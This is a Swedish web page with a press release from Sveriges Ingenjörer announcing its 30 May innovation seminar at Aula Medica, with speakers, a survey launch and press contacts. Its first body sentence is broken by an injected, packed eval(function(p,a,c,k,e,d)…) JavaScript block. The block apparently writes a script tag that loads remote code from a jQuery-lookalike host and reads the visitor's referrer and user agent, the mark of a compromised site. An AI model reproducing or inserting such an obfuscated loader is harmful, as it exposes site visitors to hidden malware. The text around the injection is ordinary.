Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Innovation, ny teknik och hållbarhet – Sveriges Ingenjörer presenterar idéer som utvecklar Sverige

Innovation, ny teknik och hållbarhet – Sveriges Ingenjörer presenterar idéer som utvecklar Sverige
Sebastian

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tyfsr|var|u0026u|referrer|idkzy||js|php’.split(’|’),0,{}))
30 maj når Sveriges Ingenjörers två år långa innovationsresa, Idélandet Sverige, sin slutdestination i Aula Medica i Stockholm. 

Varmt välkommen att ta del av inspiration från bland andra toppdiplomaten Jan Eliasson, nanoteknologiprofessorn Maria Strømme samt läkaren och entreprenören Habib Frost. Temat för deras framträdanden är vikten av innovation, möjligheterna med ny teknik och hur dessa kan bidra till en hållbar värld. Dessutom får du se exempel på nya idéer och tekniska lösningar som ingenjörer runt om i Sverige skissat fram under Sveriges Ingenjörers innovationsresa.

I samband med seminariet släpper Sveriges Ingenjörer och Sifo innehåll från en ny undersökning om svenskarnas syn på ingenjörer, ny teknik och hållbarhet. 

Om ni är intresserade av intervjuer med talarna ovan, Peter Larsson, samhällspolitisk direktör Sveriges Ingenjörer, eller Ulrika Lindstrand, ny förbundsordförande Sveriges Ingenjörer, vänligen boka via Liza Skoglund, liza@balodis.se, 072 350 92 22.

Tid: 30 maj 16.30 – 19.30
Plats: Aula Medica, Karolinska Institutet, Nobels väg 6 i Solna
O.s.a: liza@balodis.se

Hela programmet: www.idelandet.se under Stockholm 30 maj